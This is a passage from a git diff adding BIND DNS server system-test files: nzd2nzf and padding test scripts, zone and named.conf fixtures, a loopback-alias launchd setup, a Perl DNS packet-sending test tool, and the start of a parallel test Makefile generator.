1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 +send diff --git a/bin/tests/system/nzd2nzf/clean.sh b/bin/tests/system/nzd2nzf/clean.sh new file mode 100644 index 0000000..153cca1 --- /dev/null +++ b/bin/tests/system/nzd2nzf/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.run +rm -f */named.memstats +rm -f dig.out.* +rm -f rndc.out* +rm -f ns*/*.nzf +rm -f ns*/*.nzd ns*/*.nzd-lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/nzd2nzf/ns1/added.db b/bin/tests/system/nzd2nzf/ns1/added.db new file mode 100644 index 0000000..286e717 --- /dev/null +++ b/bin/tests/system/nzd2nzf/ns1/added.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +;$ORIGIN added.example. +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a A 10.0.0.1 +mail A 10.0.0.2 diff --git a/bin/tests/system/nzd2nzf/ns1/named.conf.in b/bin/tests/system/nzd2nzf/ns1/named.conf.in new file mode 100644 index 0000000..d8fc51f --- /dev/null +++ b/bin/tests/system/nzd2nzf/ns1/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + allow-query { any; }; + recursion no; + allow-new-zones yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/nzd2nzf/prereq.sh b/bin/tests/system/nzd2nzf/prereq.sh new file mode 100644 index 0000000..5498945 --- /dev/null +++ b/bin/tests/system/nzd2nzf/prereq.sh @@ -0,0 +1,20 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if ! $FEATURETEST --with-lmdb; then + echo_i "This test requires LMDB support (--with-lmdb)" + exit 255 +fi + +exit 0 diff --git a/bin/tests/system/nzd2nzf/setup.sh b/bin/tests/system/nzd2nzf/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/nzd2nzf/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/nzd2nzf/tests.sh b/bin/tests/system/nzd2nzf/tests.sh new file mode 100644 index 0000000..9f86d4a --- /dev/null +++ b/bin/tests/system/nzd2nzf/tests.sh @@ -0,0 +1,80 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "querying for non-existing zone data ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 a.added.example a > dig.out.ns1.$n || ret=1 +grep 'status: REFUSED' dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "adding a new zone into default NZD using rndc addzone ($n)" +$RNDCCMD 10.53.0.1 addzone "added.example { type master; file \"added.db\"; };" 2>&1 | sed 's/^/I:ns1 /' | cat_i +sleep 2 + +n=`expr $n + 1` +echo_i "querying for existing zone data ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 a.added.example a > dig.out.ns1.$n || ret=1 +grep 'status: NOERROR' dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "stopping ns1" +stop_server ns1 + +n=`expr $n + 1` +echo_i "dumping _default.nzd to _default.nzf ($n)" +$NZD2NZF ns1/_default.nzd > ns1/_default.nzf || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that _default.nzf contains the expected content ($n)" +grep 'zone "added.example" { type master; file "added.db"; };' ns1/_default.nzf > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting _default.nzd database" +rm -f ns1/_default.nzd + +echo_i "starting ns1 which should migrate the .nzf to .nzd" +start_server --noclean --restart --port ${PORT} ns1 + +n=`expr $n + 1` +echo_i "querying for zone data from migrated zone config ($n)" +# retry loop in case the server restart above causes transient failures +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.1 a.added.example a > dig.out.ns1.$n || ret=1 + grep 'status: NOERROR' dig.out.ns1.$n > /dev/null || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +exit $status diff --git a/bin/tests/system/org.isc.bind.system b/bin/tests/system/org.isc.bind.system new file mode 100644 index 0000000..276437a --- /dev/null +++ b/bin/tests/system/org.isc.bind.system @@ -0,0 +1,27 @@ +#!/bin/sh +# +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +ifup() { + /sbin/ifconfig lo0 10.53.$1.$3 alias + /sbin/ifconfig lo0 inet6 fd92:7065:b8e:${2}ff::${3} alias +} + +for ns in 1 2 3 4 5 6 7 8 9 10 +do + ifup 0 ff $ns +done +for ns in 1 2 +do + ifup 1 99 $ns + ifup 2 00 $ns +done diff --git a/bin/tests/system/org.isc.bind.system.plist b/bin/tests/system/org.isc.bind.system.plist new file mode 100644 index 0000000..18d3c5d --- /dev/null +++ b/bin/tests/system/org.isc.bind.system.plist @@ -0,0 +1,17 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" + "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> +<plist version="1.0"> +<dict> + <key>Label</key> + <string>org.isc.bind.system</string> + <key>ProgramArguments</key> + <array> + <string>/bin/bash</string> + <string>/Library/LaunchDaemons/org.isc.bind.system</string> + </array> + <key>RunAtLoad</key> + <true/> +</dict> +</plist> + diff --git a/bin/tests/system/packet.pl b/bin/tests/system/packet.pl new file mode 100644 index 0000000..900a0c0 --- /dev/null +++ b/bin/tests/system/packet.pl @@ -0,0 +1,164 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This is a tool for sending an arbitrary packet via UDP or TCP to an +# arbitrary address and port. The packet is specified in a file or on +# the standard input, in the form of a series of bytes in hexadecimal. +# Whitespace is ignored, as is anything following a '#' symbol. +# +# For example, the following input would generate normal query for +# isc.org/NS/IN": +# +# # QID: +# 0c d8 +# # header: +# 01 00 00 01 00 00 00 00 00 00 +# # qname isc.org: +# 03 69 73 63 03 6f 72 67 00 +# # qtype NS: +# 00 02 +# # qclass IN: +# 00 01 +# +# Note that we do not wait for a response for the server. This is simply +# a way of injecting arbitrary packets to test server resposnes. +# +# Usage: packet.pl [-a <address>] [-d] [-p <port>] [-t (udp|tcp)] [-r <repeats>] [filename] +# +# Options: +# -a <address>: specify address (XXX: no IPv6 support yet) +# -p <port>: specify port +# -t <protocol>: specify UDP or TCP +# -r <num>: send packet <num> times +# -d: dump response packets +# +# If not specified, address defaults to 127.0.0.1, port to 53, protocol +# to udp, and file to stdin. + +require 5.006.001; + +use strict; +use Getopt::Std; +use IO::File; +use IO::Socket; + +sub usage { + print ("Usage: packet.pl [-a address] [-d] [-p port] [-t (tcp|udp)] [-r <repeats>] [file]\n"); + exit 1; +} + +my $sock; +my $proto; + +sub dumppacket { + use Net::DNS; + use Net::DNS::Packet; + + my $rin; + my $rout; + $rin = ''; + vec($rin, fileno($sock), 1) = 1; + select($rout = $rin, undef, undef, 1); + if (vec($rout, fileno($sock), 1)) { + my $buf; + + if ($proto eq "udp") { + $sock->recv($buf, 512); + } else { + my $n = $sock->sysread($buf, 2); + return unless $n == 2; + my $len = unpack("n", $buf); + $n = $sock->sysread($buf, $len); + return unless $n == $len; + } + + my $response; + if ($Net::DNS::VERSION > 0.68) { + $response = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($response, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + $response->print; + } +} + +my %options={}; +getopts("a:dp:t:r:", \%options); + +my $addr = "127.0.0.1"; +$addr = $options{a} if defined $options{a}; + +my $port = 53; +$port = $options{p} if defined $options{p}; + +$proto = "udp"; +$proto = lc $options{t} if defined $options{t}; +usage if ($proto !~ /^(udp|tcp)$/); + +my $repeats = 1; +$repeats = $options{r} if defined $options{r}; + +my $file = "STDIN"; +if (@ARGV >= 1) { + my $filename = shift @ARGV; + open FH, "<$filename" or die "$filename: $!"; + $file = "FH"; +} + +my $input = ""; +while (defined(my $line = <$file>) ) { + chomp $line; + $line =~ s/#.*$//; + $input .= $line; +} + +$input =~ s/\s+//g; +my $data = pack("H*", $input); +my $len = length $data; + +my $output = unpack("H*", $data); +print ("sending $repeats time(s): $output\n"); + +$sock = IO::Socket::INET->new(PeerAddr => $addr, PeerPort => $port, + Blocking => 0, + Proto => $proto,) or die "$!"; + +STDOUT->autoflush(1); + +my $bytes = 0; +while ($repeats > 0) { + if ($proto eq "udp") { + $bytes += $sock->send($data); + } else { + $bytes += $sock->syswrite(pack("n", $len), 2); + $bytes += $sock->syswrite($data, $len); + } + + $repeats = $repeats - 1; + + if ($repeats % 1000 == 0) { + print "."; + } +} + +$sock->shutdown(SHUT_WR); +if (defined $options{d}) { + dumppacket; +} + +$sock->close; +close $file; +print ("\nsent $bytes bytes to $addr:$port\n"); diff --git a/bin/tests/system/padding/clean.sh b/bin/tests/system/padding/clean.sh new file mode 100644 index 0000000..eef2174 --- /dev/null +++ b/bin/tests/system/padding/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns*/named.stats +rm -f ns*/named.stats.prev +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/padding/ns1/named.conf.in b/bin/tests/system/padding/ns1/named.conf.in new file mode 100644 index 0000000..26cf4b3 --- /dev/null +++ b/bin/tests/system/padding/ns1/named.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/padding/ns1/root.db b/bin/tests/system/padding/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/padding/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/padding/ns2/example.db b/bin/tests/system/padding/ns2/example.db new file mode 100644 index 0000000..f6a4b03 --- /dev/null +++ b/bin/tests/system/padding/ns2/example.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA ns2 hostmaster.isc.org. 1 600 600 1200 600 +@ NS ns2 +ns2 A 10.53.0.2 +foo A 10.53.1.1 diff --git a/bin/tests/system/padding/ns2/named.conf.in b/bin/tests/system/padding/ns2/named.conf.in new file mode 100644 index 0000000..318f23a --- /dev/null +++ b/bin/tests/system/padding/ns2/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + acache-enable yes; + send-cookie yes; + response-padding { !10.53.0.8; any; } block-size 64; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/padding/ns3/named.conf.in b/bin/tests/system/padding/ns3/named.conf.in new file mode 100644 index 0000000..cf9434f --- /dev/null +++ b/bin/tests/system/padding/ns3/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +server 10.53.0.2 { + tcp-only yes; + padding 64; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/padding/ns4/named.conf.in b/bin/tests/system/padding/ns4/named.conf.in new file mode 100644 index 0000000..9a1651e --- /dev/null +++ b/bin/tests/system/padding/ns4/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +server 10.53.0.2 { + tcp-only no; + padding 64; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/padding/setup.sh b/bin/tests/system/padding/setup.sh new file mode 100644 index 0000000..9e4f563 --- /dev/null +++ b/bin/tests/system/padding/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL ./clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +touch ns2/named.stats diff --git a/bin/tests/system/padding/tests.sh b/bin/tests/system/padding/tests.sh new file mode 100644 index 0000000..e50a5ab --- /dev/null +++ b/bin/tests/system/padding/tests.sh @@ -0,0 +1,134 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +n=0 +status=0 + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +getcookie() { + awk '$2 == "COOKIE:" { + print $3; + }' < $1 +} + +echo_i "checking that dig handles padding ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +qr +padding=128 foo.example @10.53.0.2 > dig.out.test$n +grep "; PAD" dig.out.test$n > /dev/null || ret=1 +grep "; QUERY SIZE: 128" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that dig added padding ($n)" +ret=0 +n=`expr $n + 1` +nextpart ns2/named.stats > /dev/null +$RNDCCMD 10.53.0.2 stats +wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1 +nextpart ns2/named.stats | grep "EDNS padding option received" > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that padding is added for TCP responses ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc +padding=128 foo.example @10.53.0.2 > dig.out.test$n +grep "; PAD" dig.out.test$n > /dev/null || ret=1 +grep "rcvd: 128" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that padding is added to valid cookie responses ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +cookie foo.example @10.53.0.2 > dig.out.testc +cookie=`getcookie dig.out.testc` +$DIG $DIGOPTS +cookie=$cookie +padding=128 foo.example @10.53.0.2 > dig.out.test$n +grep "; PAD" dig.out.test$n > /dev/null || ret=1 +grep "rcvd: 128" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that padding must be requested (TCP) ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc foo.example @10.53.0.2 > dig.out.test$n +grep "; PAD" dig.out.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that padding must be requested (valid cookie) ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +cookie=$cookie foo.example @10.53.0.2 > dig.out.test$n +grep "; PAD" dig.out.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that padding can be filtered out ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc +padding=128 -b 10.53.0.8 foo.example @10.53.0.2 > dig.out.test$n +grep "; PAD" dig.out.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that a TCP and padding server config enables padding ($n)" +ret=0 +n=`expr $n + 1` +nextpart ns2/named.stats > /dev/null +$RNDCCMD 10.53.0.2 stats +wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1 +opad=`nextpart ns2/named.stats | awk '/EDNS padding option received/ { print $1}'` +$DIG $DIGOPTS foo.example @10.53.0.3 > dig.out.test$n +$RNDCCMD 10.53.0.2 stats +wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1 +npad=`nextpart ns2/named.stats | awk '/EDNS padding option received/ { print $1}'` +if [ "$opad" -eq "$npad" ]; then echo_i "error: opad ($opad) == npad ($npad)"; ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that a padding server config should enforce TCP ($n)" +ret=0 +n=`expr $n + 1` +nextpart ns2/named.stats > /dev/null +$RNDCCMD 10.53.0.2 stats +wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1 +opad=`nextpart ns2/named.stats | awk '/EDNS padding option received/ { print $1}'` +$DIG $DIGOPTS foo.example @10.53.0.4 > dig.out.test$n +$RNDCCMD 10.53.0.2 stats +wait_for_log_peek 5 "--- Statistics Dump ---" ns2/named.stats || ret=1 +npad=`nextpart ns2/named.stats | awk '/EDNS padding option received/ { print $1}'` +if [ "$opad" -ne "$npad" ]; then echo_i "error: opad ($opad) != npad ($npad)"; ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that zero-length padding option has no effect ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +qr +ednsopt=12 foo.example @10.53.0.2 > dig.out.test$n.1 +grep "; PAD" dig.out.test$n.1 > /dev/null || ret=1 +$DIG $DIGOPTS +qr +ednsopt=12:00 foo.example @10.53.0.2 > dig.out.test$n.2 +grep "; PAD" dig.out.test$n.2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/parallel.sh b/bin/tests/system/parallel.sh new file mode 100644 index 0000000..8d156cf --- /dev/null +++ b/bin/tests/system/parallel.sh @@ -0,0 +1,36 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +. ./conf.sh + +PARALLELS=`echo $PARALLELDIRS | sed "s|\([^ ][^ ]*\)|test-\1|g;" | tr _ -` + +echo ".PHONY: $PARALLELS" +echo +echo "check_interfaces:" +echo " @${PERL} testsock.pl > /dev/null 2>&1 || { \\" +echo " echo \"I:NOTE: System tests were skipped because they require the\"; \\" +echo " echo \"I: test IP addresses 10.53.0.* to be configured as alias\"; \\" +echo " echo \"I: addresses on the loopback interface. Please run\"; \\" +echo " echo \"I: \"bin/tests/system/ifconfig.sh up\" as root to configure them.\"; \\" +echo " exit 1; \\" +echo " }" +echo +echo "test check: $PARALLELS" +port=${STARTPORT:-5000} +for directory in $PARALLELDIRS ; do + echo + echo "test-`echo $directory | tr _ -`: 